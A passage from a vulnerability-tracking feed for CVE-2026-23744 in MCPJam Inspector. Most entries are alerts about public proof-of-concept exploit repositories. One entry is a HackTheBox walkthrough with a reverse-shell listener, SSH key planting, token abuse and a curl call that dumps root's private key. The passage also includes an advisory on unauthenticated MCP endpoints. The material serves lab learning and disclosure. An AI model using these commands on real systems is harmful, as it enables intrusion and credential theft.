CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SrGinebras\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-31 12:59:17\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-31T13:00:04.000000Z"}, {"uuid": "cafdb19a-e971-4e0e-b419-3a7c961ed105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/86593", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a DevHub-HackTheBox-ss11\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SuriyaBoon\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-30 22:03:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nHTB Season 11 \u2014 DevHub Writeup Exploiting CVE-2026-23744 (MCPJam Inspector unauthenticated RCE via /api/mcp/connect) to gain initial foothold, then lateral movement through Jupyter Lab token leaked in systemd service file. Stack: nginx \u00b7 MCPJam Inspector 1.4.2 \u00b7 Jupyter Lab \u00b7 OPSMCP (root)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-30T22:06:26.000000Z"}, {"uuid": "05e34e80-a2cc-4d92-a7a5-a6c18a90cde1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/86612", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a p1ctur3p3rf3ct\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-31 02:22:26\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-23744 PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-31T03:00:03.000000Z"}, {"uuid": "b7aa9b94-0ed3-4266-a9ce-b903ea30f743", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/86640", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #RCE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a HTB-DevHub\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a thisisish\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-31 07:51:34\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-23744 RCE + Privilege Escalation\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-31T08:00:04.000000Z"}, {"uuid": "88bff29b-c6a2-45e4-9f56-af63f7ccad5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/86722", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-POC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a sbouabid-sec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-31 17:30:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-23744 \u2014 Proof of concept exploit for an unauthenticated Remote Code Execution vulnerability in MCPJam Inspector <= 1.4.2. \n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-31T18:00:03.000000Z"}, {"uuid": "a85d6771-c8e4-4e6c-9b27-ce6eb2e93257", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/86728", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Least-Significant-Bit\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-31 19:20:16\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRemote Code Execution in MCPJam 1.4.2 and older.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-31T20:00:04.000000Z"}, {"uuid": "661f4bf4-06c6-4710-b915-d8dfbe4fa9e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/ewCNvksQ23LcKFOZP4S7JiAV_BKfvwBJJ-Max0Hr7r6pTH0", "content": "", "creation_timestamp": "2026-06-02T09:00:04.000000Z"}, {"uuid": "78b4b80c-4cce-4714-8f07-14b7e1f2a8c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/86917", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit #RCE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-RCE\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a alisster00\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-02 02:40:49\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis utility was created during research involving MCPJam v1.4.2. The application exposes an API endpoint that accepts a server configuration object. Under certain conditions, insufficient validation may allow unintended command execution.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-02T03:00:04.000000Z"}, {"uuid": "8f61e402-4507-49ae-810e-d33e06ee24ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/iM-KEhksi_Imr553kiTkkvfTmUvGFxQpl0ZZII1pIQbZbYs", "content": "", "creation_timestamp": "2026-06-01T03:00:05.000000Z"}, {"uuid": "46ab3fb1-fca7-444c-bcc1-f17a43c409fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/iT1PJyzy2zf_oTXsFfTTGACzC4_vVMaCup1jJ7rbAepk_V4", "content": "", "creation_timestamp": "2026-05-31T15:00:06.000000Z"}, {"uuid": "fba7bb8f-44f2-45ec-ab1a-4a60a784d8ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/f8p5bxK_pas4UnfkqZpjsrYcnDeynT9i6FGG-tqizr_TEDo", "content": "", "creation_timestamp": "2026-05-31T03:00:04.000000Z"}, {"uuid": "cacb9f63-2404-4a6c-a786-509cf9f46bb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/m5bO2JxUlrjC2gnA88HNUmLJfMU_EWuZJKmFiTIh62H_4nM", "content": "", "creation_timestamp": "2026-05-31T09:00:04.000000Z"}, {"uuid": "49f00a39-8bac-452c-aa4d-d2f4d16447d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/UOEqxw8X8FBF5SdoLVIwOK-ODKVahezuJQZvJqlgU47R468", "content": "", "creation_timestamp": "2026-05-31T21:00:04.000000Z"}, {"uuid": "428dfd18-8cc4-41a5-bc61-cf35dbe22f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87048", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a MrR0b0t19\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-02 23:19:08\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-03T00:00:04.000000Z"}, {"uuid": "5f145d69-fe77-48fc-82c9-b65062fc3136", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87381", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-MCPJAM-RCE-exploit\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Dahalsamir\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 05:22:33\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis Python proof-of-concept targets a vulnerable MCP (Model Context Protocol) service exposed by the target application. The vulnerability allows an attacker to supply arbitrary server configuration parameters through the /api/mcp/connect endpoint.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T06:04:18.000000Z"}, {"uuid": "3c810799-9a06-436e-97e7-650388a660c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87070", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #RCE #CVE #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a mcp-pwn\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jf-gondim\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-03 02:47:19\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC exploit for CVE-2026-23744 \u2014 unauthenticated RCE in MCPJam Inspector via unvalidated serverConfig command injection on /api/mcp/connect, enabling reverse shell as process owner without credentials.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-03T03:05:03.000000Z"}, {"uuid": "726195a1-8118-4fec-8a4b-759236c49dd9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87014", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a TYehan\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-02 16:59:00\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nProof of Concept exploit for CVE-2026-23744: Remote Code Execution vulnerability in MCPJam Inspector <= 1.4.2\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-02T17:00:04.000000Z"}, {"uuid": "ced08f13-fc88-40df-94d9-f636fd205102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/87395", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-poc\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a keeieb79\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-06-05 07:38:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\ncve-2026-23744 python exploit\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-06-05T08:31:40.000000Z"}, {"uuid": "9a5d0e51-68d4-423a-a7e2-887607b53ff5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/5i-pTes7Ja_8Uhuw9wP6auiAd2fWyZYO3DYvaqIb_mREm_4", "content": "", "creation_timestamp": "2026-06-03T09:00:04.000000Z"}, {"uuid": "c098d872-eea8-4cc3-9101-abc7367aebd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/oFANvhI-6gD5N3MdJioXISYRmmtnWIQ07Tw4W0tvnq7rKmo", "content": "", "creation_timestamp": "2026-06-02T21:00:04.000000Z"}, {"uuid": "8f26a78d-5a1f-4632-9385-64f9ea1ba748", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/2GKVzEdq0Q1GgXdde3R68qhjmtmEcsIfO4W2udc5u2OvA5M", "content": "", "creation_timestamp": "2026-06-05T09:00:04.000000Z"}, {"uuid": "150e0d93-d011-4983-8339-52110854caa2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/hAogTto79Jt-ZuW6Hp_UeFLdQ6LmAiGRTnFY6xKkiQBfaYY", "content": "", "creation_timestamp": "2026-06-04T21:00:04.000000Z"}, {"uuid": "78673c3a-b92c-4903-906b-0057b7b42487", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-06-07)", "content": "", "creation_timestamp": "2026-06-07T00:00:00.000000Z"}, {"uuid": "c7da0f33-d719-4341-b950-79389d22c220", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/Yann-P/597c2a31f6485fd849eb896411334a3f", "content": "\n1. nmap\n2. find port 80\n3. http page mentions mcp port 6274\n4. try access port 6274 in http\n5. shows mcpjam landing page\n6. find CVE and exploit https://raw.githubusercontent.com/alisster00/CVE-2026-23744-RCE/refs/heads/main/script.py\n7. reverse shell, `nc -l 10.10.15.61 4444`, `python mcpexploit.py --lport 4444 --lhost 10.10.15.61 -p 6274 devhub.htb`\n8. put autorized key, `echo 'ssh-ed25519 AAAAC3NzaC1l... htb' > ~/.ssh/authorized_keys`\n\n### Track 1: linpeas\n\n1. on host, `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh`\n2. on host, `scp -i ~/.ssh/htb ./linpeas.sh mcp-dev@devhub.htb:~/`\n3. on target, run linpeas\n\nFindings\n\n```\nhttps://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\nPackageKit version detected: 1.2.5\nVulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit 1.2.5 is in the vulnerable range >=1.0.2 <=1.3.4\n```\n\nNot exploited for now.\n\n### Track 2: lateral movement to analyst\n\n10. ls /home, shows user \"analyst\"\n11. `ps aux | grep analyst`\n\n```\nanalyst 1077 0.0 2.4 182524 96256 ? Ss 09:53 0:06 /home/analyst/jupyter-env/bin/python3 /home/analyst/jupyter-env/bin/jupyter-lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 --ServerApp.password= --ServerApp.allow_origin= --ServerApp.disable_check_xsrf=False\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:01 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n### Track 3: Jupyter\n\n1. Expose port 8888\n2. `ssh -i ~/.ssh/htb mcp-dev@devhub.htb -L 8888:localhost:8888 `\n3. token is leaked by ps aux above, set up new password \"yolo\" on localhost:8888 web ui.\n4. new terminal on jupyterlab (shell as analyst) -> `cat user.txt` -> `e73a08ded246c24...`\n\nLateral to analyst succeeded. User flag solved.\n\nAdditional: \n1. `mkdir ~/.ssh && echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NT.... htb' > ~/.ssh/authorized_keys`\n\n### Track 4: linpeas again\n\n1. `scp -i ~/.ssh/htb ./linpeas.sh analyst@devhub.htb:~/`\n\nFindings\n\n```\n\u2550\u2563 Services with writable paths? . jupyter.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\njupyter.service: /home/analyst/jupyter-env/bin/jupyter (from ExecStart=/home/analyst/jupyter-env/bin/jupyter lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token='a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7' --ServerApp.password='' --ServerApp.allow_origin='' --ServerApp.disable_check_xsrf=False)\nopsmcp.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\n```\n\n\n### Exploration\n- processes ran as root\n\n```\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:02 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n- env: nothing.\n\n## Track 5: /opt/opsmcp/server.py runs as root\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOPSMCP - Operations MCP Server\nInternal tool for system operations management\n\"\"\"\n\nfrom flask import Flask, jsonify, request\nimport os\n\napp = Flask(__name__)\n\n# API Key for authentication\nVALID_API_KEY = \"opsmcp_secret_key_4f5a6b7c8d9e0f1a\"\n\n...\n\ndef check_auth():\n \"\"\"Check API key authentication\"\"\"\n api_key = request.headers.get('X-API-Key', '')\n return api_key == VALID_API_KEY\n\n...\n\n@app.route('/tools/call', methods=['POST'])\ndef call_tool():\n if not check_auth():\n return jsonify({\"error\": \"Unauthorized\", \"message\": \"Valid X-API-Key header required\"}), 401\n\n data = request.get_json() or {}\n tool_name = data.get('name', '')\n args = data.get('arguments', {})\n\n if not tool_name:\n return jsonify({\"error\": \"Tool name required\"}), 400\n\n if tool_name not in ALL_TOOLS:\n return jsonify({\"error\": f\"Unknown tool: {tool_name}\"}), 404\n\n # Execute tool\n if tool_name == \"ops.system_status\":\n ...\n\n\n elif tool_name == \"ops._admin_dump\":\n target = args.get('target', '')\n confirm = args.get('confirm', False)\n\n if not confirm:\n return jsonify({\n \"error\": \"Confirmation required\",\n \"usage\": \"Set confirm=true to proceed\",\n \"warning\": \"This dumps sensitive credentials\"\n })\n\n if target == \"ssh_keys\":\n try:\n with open('/root/.ssh/id_rsa', 'r') as f:\n key_data = f.read()\n return jsonify({\n \"target\": \"ssh_keys\",\n \"root_private_key\": key_data,\n \"note\": \"Emergency recovery key dump\"\n })\n except Exception as e:\n return jsonify({\n \"target\": \"ssh_keys\",\n \"error\": f\"Could not read key: {str(e)}\"\n })\n\n ...\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=5000, debug=False)\n```\n\n\n1. There are tokens in cleartext\n2. In track 6 we have already seen that flask is owned by root: connection to this finding?\n3. Script analysis\n\t1. we probably have the passwords of analyst but not needed anymore\n\t2. This can leak /root/.ssh/id_rsa !\n4. we want to expose this, call with `tool_name=ops._admin_dump` and `target == \"ssh_keys\":`\n\t1. expose `ssh -i ~/.ssh/htb analyst@devhub.htb -L 5000:localhost:5000`\n\t2. try\n\t\n```\n\tcurl localhost:5000\n{\"auth\":\"Required - X-API-Key header\",\"endpoints\":[\"/tools/list\",\"/tools/call\",\"/health\"],\"server\":\"OPSMCP\",\"status\":\"operational\",\"version\":\"2.1.0\"}\n```\n\n```\n curl -s -X POST \\\n 'http://localhost:5000/tools/call' \\\n -H 'X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a' \\\n -H \"Content-Type: application/json\" -d '{\"name\": \"ops._admin_dump\", \"arguments\": {\"confirm\": true, \"target\": \"ssh_keys\"}}'\n```\n\nreturns the root ssh key.\n\n1. vim ~/.ssh/htb2\n2. chmod 600 ~/.ssh/htb2\n3. ssh -i ~/.ssh/htb2 root@devhub.htb\n4. cat root.txt\n\nSolved\n\n## Track 6 : writable /home/analyst/jupyter-env/bin found by linpeas\n\n1. \n\n```\n analyst@devhub:~$ ls -Rl /home/analyst/jupyter-env/bin\n/home/analyst/jupyter-env/bin:\n-rw-r--r-- 1 analyst analyst 2008 Jan 22 15:03 activate\n-rw-r--r-- 1 analyst analyst 934 Jan 22 15:03 activate.csh\n-rw-r--r-- 1 analyst analyst 2210 Jan 22 15:03 activate.fish\n-rw-r--r-- 1 analyst analyst 9033 Jan 22 15:03 Activate.ps1\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 debugpy\n-rwxr-xr-x 1 analyst analyst 217 Jan 22 15:06 debugpy-adapter\n-rwxr-xr-x 1 analyst analyst 210 Jan 22 15:06 f2py\n-rwxr-xr-x 1 root root 202 Mar 16 21:28 flask\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 fonttools\n```\n\nflask is owned by root\n\nTrack abandoned\n\n", "creation_timestamp": "2026-06-18T12:30:28.000000Z"}, {"uuid": "fe9f708b-c492-46b1-91dd-34d3178cc9c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/sandh0t/02a08b8bb92781def27062b182bc401b", "content": "\n\n### Summary\n\nMissing authentication on MCP Manager and Adapter HTTP API endpoints allows any network-accessible attacker to execute arbitrary MCP tools without authentication. When a used MCP server allows system command execution capabilities, this vulnerability could be exploited to perform Remote Code Execution (RCE).\n\nThis vulnerability is similar to [CVE-2026-23744](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6) and [CVE-2025-49596](https://github.com/advisories/GHSA-7f8r-222p-6f5g). This vulnerability is exploitable with no user interaction and doesn't require authentication. Since MCPJam Inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.\n\n\n### Details\n\nThe `/api/mcp/adapter-http/:serverId` and `/api/mcp/manager-http/:serverId` endpoints are explicitly excluded from authentication middleware in server/middleware/session-auth.ts (lines 45-46):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/middleware/session-auth.ts#L45\n\ntypescriptconst UNPROTECTED_PREFIXES = [\n ...\n \"/api/mcp/adapter-http/\", // HTTP adapter for tunneled MCP clients - auth via URL secrecy\n \"/api/mcp/manager-http/\", // HTTP manager for tunneled MCP clients - auth via URL secrecy\n];\n\n```\n\nThese endpoints accept JSON-RPC requests and forward them directly to connected MCP servers without any authentication checks (see server/routes/mcp/http-adapters.ts, lines 149-159):\n\n```typescript\n// https://github.com/MCPJam/inspector/blob/eaad8c8e61f1a864eb103900d36e74b230e1aceb/mcpjam-inspector/server/routes/mcp/http-adapters.ts#L149\n\ntypescriptconst response = await handleJsonRpc(\n normalizedServerId,\n body as any,\n clientManager,\n mode,\n);\nreturn c.json(response);\n\n```\n\nSince MCPJam Inspector binds to `0.0.0.0` by default, its HTTP APIs are remotely reachable. An attacker requires:\n\n* Network connectivity to MCPJam Inspector (local network, Docker exposed port, or 